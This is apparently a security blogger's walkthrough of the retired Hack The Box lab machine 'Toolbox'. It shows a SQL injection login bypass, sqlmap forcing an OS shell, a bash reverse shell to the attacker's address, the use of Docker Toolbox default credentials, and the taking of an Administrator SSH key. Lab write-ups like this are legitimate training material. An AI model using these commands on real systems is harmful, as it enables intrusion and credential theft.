Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Toolbox

Name: Toolbox
Release Date: 12 Mar 2021
Retire Date: 24 Apr 2021
OS: Other/IoT
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
HTB-Bot 01 months, 00 days, 00 hours, 00 mins, 00 seconds
HTB-Bot 01 months, 00 days, 00 hours, 00 mins, 00 seconds
Creator: MinatoTW
Pentest Workshop PDF: Toolbox.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.236

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have added all the autorecon outputs to the Pentest Workshop PDF. Looking at the FTP TCP 21 output, we see that anonymous access is allowed. When we FTP to the target, we see a docker-toolbox.exe that we can GET.

Between the docker-toolbox executable and Apache/2.4.38 (Debian) running on a Windows box, it is safe to assume there is definitely some containers running. Also, looking at the HTTPS TCP 443 output, we see a certificate entry for admin.megalogistic.htb to our /etc/hosts file.

 

sudo vi /etc/hosts
i #to enter "Insert" mode
10.10.10.236 admin.megalogistic.com
ESC
:wq!
ENTER

 

Now navigate to https://10.10.10.236 and https://admin.megalogistic.com

In the login panel, try to log in with ' as the username and password. We will get an error message (barely legible with black text on a black background).


Warning: pg_query(): Query failed: ERROR: syntax error at or near ")" LINE 1: ...T * FROM users WHERE username = ''' AND password = md5('''); ^ in /var/www/admin/index.php on line 10

Warning: pg_num_rows() expects parameter 1 to be resource, bool given in /var/www/admin/index.php on line 11
 

This login is absolutely vulnerable to SQLi Authentication Bypass. After trying several different ones for PostGRESQL (we can tell it is used by the pg_query and pg_num_rows portions of the error) from PayloadAllTheThings, we finally find the right combination.

 

Username = admin' or 1=1 --

One downside is that we now need to use sqlmap to check out the database. I call it a downside because sqlmap is one of the tools banned during the OSCP exam. We still need to know how to use it and based on the error we can deduce the login query to something along the lines of:

 

SELECT * FROM users WHERE username = '{input user}' AND password = md5('{input password}');

 

So, if we need to intercept the POST request for the login in Burp and save it to a file (toolbox.req). Then,we use this sqlmap command against that file. Since the pg_ info means we're dealing with a PostGRESQL instance, let's jump straight to forcing an OS shell.

 

sqlmap -r toolbox.req --risk=3 --level=3 --batch --force-ssl --os-shell

Now that sqlmap has given us an os-shell, we can run a bash reverse shell to get a better shell.

 

On Attacking Machine:
nc -lvnp 1337

On Victim Machine:
bash -c 'bash -i >& /dev/tcp/<YOUR TUN0 IP>/1337 0>&1'

Change to the postgres home folder and grab the user.txt flag.

 

postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
f0183e44378ea9774433e2ca6ac78c6a  flag.txt

 

PRIVILEGE ESCALATION

 

We know that docker-toolbox uses VirtualBox to hold all the VMs, is always the gateway address of the containers and has default credentials of:

 

docker:tcuser

 

So, if we upgrade to a TTY shell using:

 

python3 -c 'import pty; pty.spawn("/bin/bash")'

 

we should be able to pull the ifconfig of the container and ssh to the gateway address with those credentials. The documentation for this can be found here.

In the /c/Users/Administrator/.ssh folder is the private key for the Administrator user.

Copy that onto the Attacking machine.
chmod 400 id_rsa 
ssh -i id_rsa Administrator@10.10.10.236

 

Grab the root.txt flag and proof and this box is complete! Pop the champagne!

 

administrator@TOOLBOX C:\Users\Administrator\Desktop>type root.txt 
cc9a0b76ac17f8f475250738b96261b3